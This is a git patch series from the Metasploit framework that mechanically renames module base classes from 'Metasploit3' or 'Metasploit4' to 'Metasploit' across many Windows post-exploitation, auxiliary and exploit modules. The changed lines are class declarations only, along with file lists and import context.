a/modules/post/windows/gather/resolve_sid.rb b/modules/post/windows/gather/resolve_sid.rb index d0ead5f552..fa8592946c 100644 --- a/modules/post/windows/gather/resolve_sid.rb +++ b/modules/post/windows/gather/resolve_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index 99cee3b42e..c41d5da4e8 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index f351301a9e..f1891cda36 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbconfig' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info(info, 'Name' => 'Windows Gather Screen Spy', diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb index 4a1f6c4dba..a8bb720d7c 100644 --- a/modules/post/windows/gather/smart_hashdump.rb +++ b/modules/post/windows/gather/smart_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index 76566231ff..e330a2f85e 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 17af8ff7fc..0ec0abc5b5 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/win_privs.rb b/modules/post/windows/gather/win_privs.rb index acb6e8dfa7..cfb8d78d09 100644 --- a/modules/post/windows/gather/win_privs.rb +++ b/modules/post/windows/gather/win_privs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/wmic_command.rb b/modules/post/windows/gather/wmic_command.rb index 65af916b48..f87345d3bc 100644 --- a/modules/post/windows/gather/wmic_command.rb +++ b/modules/post/windows/gather/wmic_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::WMIC diff --git a/modules/post/windows/gather/word_unc_injector.rb b/modules/post/windows/gather/word_unc_injector.rb index 2c727a4677..2cf7b95db8 100644 --- a/modules/post/windows/gather/word_unc_injector.rb +++ b/modules/post/windows/gather/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index 7eae317a56..dae3289121 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index a894ae01d3..69a1bdd01e 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) diff --git a/modules/post/windows/manage/change_password.rb b/modules/post/windows/manage/change_password.rb index 889f5af7b9..beadeb3bce 100644 --- a/modules/post/windows/manage/change_password.rb +++ b/modules/post/windows/manage/change_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index c270e7bd94..a3f841c3b4 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index 5cc08d1e83..c59d4d2d73 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/manage/download_exec.rb b/modules/post/windows/manage/download_exec.rb index b920f64184..ef5e9e94e6 100644 --- a/modules/post/windows/manage/download_exec.rb +++ b/modules/post/windows/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/manage/driver_loader.rb b/modules/post/windows/manage/driver_loader.rb index 9558084429..3cdcdb527e 100644 --- a/modules/post/windows/manage/driver_loader.rb +++ b/modules/post/windows/manage/driver_loader.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index e798ac70a0..eba215376a 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Accounts include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/enable_support_account.rb b/modules/post/windows/manage/enable_support_account.rb index c5a949c3f6..e2731523a0 100644 --- a/modules/post/windows/manage/enable_support_account.rb +++ b/modules/post/windows/manage/enable_support_account.rb @@ -1,7 +1,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/exec_powershell.rb b/modules/post/windows/manage/exec_powershell.rb index 11b6659f6b..00c3d41ee5 100644 --- a/modules/post/windows/manage/exec_powershell.rb +++ b/modules/post/windows/manage/exec_powershell.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/powershell' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index d8dbf4ee18..31bafaa9ff 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'tmpdir' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv def initialize(info = {}) diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index 82ff84eb6b..1f373735f1 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/manage/inject_ca.rb b/modules/post/windows/manage/inject_ca.rb index f86f5cdf0d..cd651b78ef 100644 --- a/modules/post/windows/manage/inject_ca.rb +++ b/modules/post/windows/manage/inject_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/inject_host.rb b/modules/post/windows/manage/inject_host.rb index 0151db3970..f0f3f17127 100644 --- a/modules/post/windows/manage/inject_host.rb +++ b/modules/post/windows/manage/inject_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/migrate.rb b/modules/post/windows/manage/migrate.rb index 5dd4e6259d..e907085bdb 100644 --- a/modules/post/windows/manage/migrate.rb +++ b/modules/post/windows/manage/migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index 5d14a36694..59ba9d091d 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/mssql' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::MSSQL diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 4900e1fc64..5cc4a3ca0d 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index 41f786ac8c..c91a797d86 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -13,7 +13,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 10c6317646..50f6cc7959 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Common diff --git a/modules/post/windows/manage/portproxy.rb b/modules/post/windows/manage/portproxy.rb index 2fc0584665..ddd861c9d7 100644 --- a/modules/post/windows/manage/portproxy.rb +++ b/modules/post/windows/manage/portproxy.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb index 8707cb705e..4bcad9e1b4 100644 --- a/modules/post/windows/manage/powershell/exec_powershell.rb +++ b/modules/post/windows/manage/powershell/exec_powershell.rb @@ -17,7 +17,7 @@ require 'zlib' # TODO: check if this can be done with REX require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/load_script.rb b/modules/post/windows/manage/powershell/load_script.rb index e3d270f9e9..7eb56ad20a 100644 --- a/modules/post/windows/manage/powershell/load_script.rb +++ b/modules/post/windows/manage/powershell/load_script.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb index 4f71034b08..ddb642f3a8 100644 --- a/modules/post/windows/manage/pptp_tunnel.rb +++ b/modules/post/windows/manage/pptp_tunnel.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 45d2de743d..ec61308511 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/pxeexploit.rb b/modules/post/windows/manage/pxeexploit.rb index 8692ed4a64..f074bbc4ae 100644 --- a/modules/post/windows/manage/pxeexploit.rb +++ b/modules/post/windows/manage/pxeexploit.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index f52eac1e24..52199ca9e7 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::ReflectiveDLLInjection diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb index 2a2437d0d2..7dab48fe30 100644 --- a/modules/post/windows/manage/remove_ca.rb +++ b/modules/post/windows/manage/remove_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/remove_host.rb b/modules/post/windows/manage/remove_host.rb index 9f78208ea3..0fea20c4c2 100644 --- a/modules/post/windows/manage/remove_host.rb +++ b/modules/post/windows/manage/remove_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index b49600378b..5aee248326 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index 36137acf65..89f71183d5 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Runas diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index a2691cc1d4..61a2944b75 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb index 9abc02bc75..7c011b9e1e 100644 --- a/modules/post/windows/manage/smart_migrate.rb +++ b/modules/post/windows/manage/smart_migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Module::Deprecated diff --git a/modules/post/windows/manage/vss_create.rb b/modules/post/windows/manage/vss_create.rb index a377af66a8..47345660fd 100644 --- a/modules/post/windows/manage/vss_create.rb +++ b/modules/post/windows/manage/vss_create.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_list.rb b/modules/post/windows/manage/vss_list.rb index 35737fb343..a9c94e7083 100644 --- a/modules/post/windows/manage/vss_list.rb +++ b/modules/post/windows/manage/vss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_mount.rb b/modules/post/windows/manage/vss_mount.rb index d71fe54b43..14dd3328c2 100644 --- a/modules/post/windows/manage/vss_mount.rb +++ b/modules/post/windows/manage/vss_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index c61fd6e128..472419a533 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_storage.rb b/modules/post/windows/manage/vss_storage.rb index 599902d94c..9cb3f9c56b 100644 --- a/modules/post/windows/manage/vss_storage.rb +++ b/modules/post/windows/manage/vss_storage.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb index eb156773d4..def92fa91d 100644 --- a/modules/post/windows/manage/webcam.rb +++ b/modules/post/windows/manage/webcam.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index cc2ad55784..9ae5730849 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/outbound_ports.rb b/modules/post/windows/recon/outbound_ports.rb index 31196ce2c6..7dea6857a3 100644 --- a/modules/post/windows/recon/outbound_ports.rb +++ b/modules/post/windows/recon/outbound_ports.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index 4e3028f341..02ad4f0376 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/wlan/wlan_bss_list.rb b/modules/post/windows/wlan/wlan_bss_list.rb index 00baa5c710..f9669457d6 100644 --- a/modules/post/windows/wlan/wlan_bss_list.rb +++ b/modules/post/windows/wlan/wlan_bss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_current_connection.rb b/modules/post/windows/wlan/wlan_current_connection.rb index a34db4f8c2..faa5337cc2 100644 --- a/modules/post/windows/wlan/wlan_current_connection.rb +++ b/modules/post/windows/wlan/wlan_current_connection.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_disconnect.rb b/modules/post/windows/wlan/wlan_disconnect.rb index 20ef90546a..231923f697 100644 --- a/modules/post/windows/wlan/wlan_disconnect.rb +++ b/modules/post/windows/wlan/wlan_disconnect.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index b16b0965e7..4eab8dc9dc 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) From 3da9535e2213ec481e772e934407f69ae319dd84 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 7 Mar 2016 09:57:22 +0100 Subject: [PATCH 501/686] change Metasploit4 class names --- modules/auxiliary/admin/appletv/appletv_display_image.rb | 2 +- modules/auxiliary/admin/appletv/appletv_display_video.rb | 2 +- modules/auxiliary/admin/chromecast/chromecast_reset.rb | 2 +- modules/auxiliary/admin/chromecast/chromecast_youtube.rb | 2 +- modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb | 2 +- modules/auxiliary/admin/firetv/firetv_youtube.rb | 2 +- modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb | 2 +- .../admin/http/foreman_openstack_satellite_priv_esc.rb | 2 +- modules/auxiliary/admin/http/katello_satellite_priv_esc.rb | 2 +- modules/auxiliary/admin/http/netgear_auth_download.rb | 2 +- modules/auxiliary/admin/http/nexpose_xxe_file_read.rb | 2 +- modules/auxiliary/admin/http/openbravo_xxe.rb | 2 +- modules/auxiliary/admin/http/typo3_sa_2009_001.rb | 2 +- modules/auxiliary/admin/http/typo3_sa_2010_020.rb | 2 +- .../auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb | 2 +- modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb | 2 +- modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb | 2 +- modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb | 2 +- modules/auxiliary/dos/dns/bind_tkey.rb | 2 +- modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb | 2 +- modules/auxiliary/dos/misc/dopewars.rb | 2 +- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 2 +- modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb | 2 +- modules/auxiliary/dos/ssl/openssl_aesni.rb | 2 +- modules/auxiliary/gather/alienvault_iso27001_sqli.rb | 2 +- modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb | 2 +- modules/auxiliary/gather/chromecast_wifi.rb | 2 +- modules/auxiliary/gather/impersonate_ssl.rb | 2 +- modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb | 2 +- modules/auxiliary/gather/joomla_contenthistory_sqli.rb | 2 +- modules/auxiliary/gather/mantisbt_admin_sqli.rb | 2 +- modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb | 2 +- modules/auxiliary/gather/opennms_xxe.rb | 2 +- modules/auxiliary/gather/shodan_search.rb | 2 +- .../scanner/http/allegro_rompager_misfortune_cookie.rb | 2 +- modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb | 2 +- modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb | 2 +- modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb | 2 +- modules/auxiliary/scanner/http/caidao_bruteforce_login.rb | 2 +- modules/auxiliary/scanner/http/chromecast_webserver.rb | 2 +- modules/auxiliary/scanner/http/concrete5_member_list.rb | 2 +- modules/auxiliary/scanner/http/host_header_injection.rb | 2 +- .../scanner/http/hp_sitescope_getfileinternal_fileaccess.rb | 2 +- .../scanner/http/hp_sitescope_getsitescopeconfiguration.rb | 2 +- .../scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb | 2 +- modules/auxiliary/scanner/http/http_put.rb | 2 +- .../auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb | 2 +- modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb | 2 +- modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb | 2 +- .../scanner/http/novell_file_reporter_fsfui_fileaccess.rb | 2 +- .../scanner/http/novell_file_reporter_srs_fileaccess.rb | 2 +- modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb | 2 +- modules/auxiliary/scanner/http/ssl.rb | 2 +- modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb | 2 +- modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb | 2 +- modules/auxiliary/scanner/printer/printer_delete_file.rb | 2 +- modules/auxiliary/scanner/printer/printer_download_file.rb | 2 +- modules/auxiliary/scanner/printer/printer_env_vars.rb | 2 +- modules/auxiliary/scanner/printer/printer_list_dir.rb | 2 +- modules/auxiliary/scanner/printer/printer_list_volumes.rb | 2 +- modules/auxiliary/scanner/printer/printer_ready_message.rb | 2 +- modules/auxiliary/scanner/printer/printer_upload_file.rb | 2 +- modules/auxiliary/scanner/printer/printer_version_info.rb | 2 +- .../auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb | 2 +- modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb | 2 +- modules/auxiliary/scanner/sap/sap_icf_public_info.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb | 2 +- .../auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb | 2 +- .../auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb | 2 +- modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb | 2 +- modules/auxiliary/scanner/sap/sap_router_info_request.rb | 2 +- modules/auxiliary/scanner/sap/sap_service_discovery.rb | 2 +- modules/auxiliary/scanner/sap/sap_smb_relay.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb | 2 +- .../sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb | 2 +- .../scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb | 2 +- .../scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb | 2 +- .../scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb | 2 +- .../scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb | 2 +- .../auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb | 2 +- modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb | 2 +- .../auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb | 2 +- modules/auxiliary/scanner/ssh/detect_kippo.rb | 2 +- modules/auxiliary/scanner/ssh/fortinet_backdoor.rb | 2 +- modules/auxiliary/scanner/telnet/brocade_enable_login.rb | 2 +- modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb | 2 +- modules/auxiliary/server/tnftp_savefile.rb | 2 +- modules/encoders/x86/bmp_polyglot.rb | 2 +- modules/exploits/aix/local/ibstat_path.rb | 2 +- modules/exploits/android/local/futex_requeue.rb | 2 +- modules/exploits/freebsd/http/watchguard_cmd_exec.rb | 2 +- modules/exploits/freebsd/local/mmap.rb | 2 +- modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb | 2 +- modules/exploits/linux/http/advantech_switch_bash_env_exec.rb | 2 +- modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb | 2 +- modules/exploits/linux/http/dlink_dcs931l_upload.rb | 2 +- 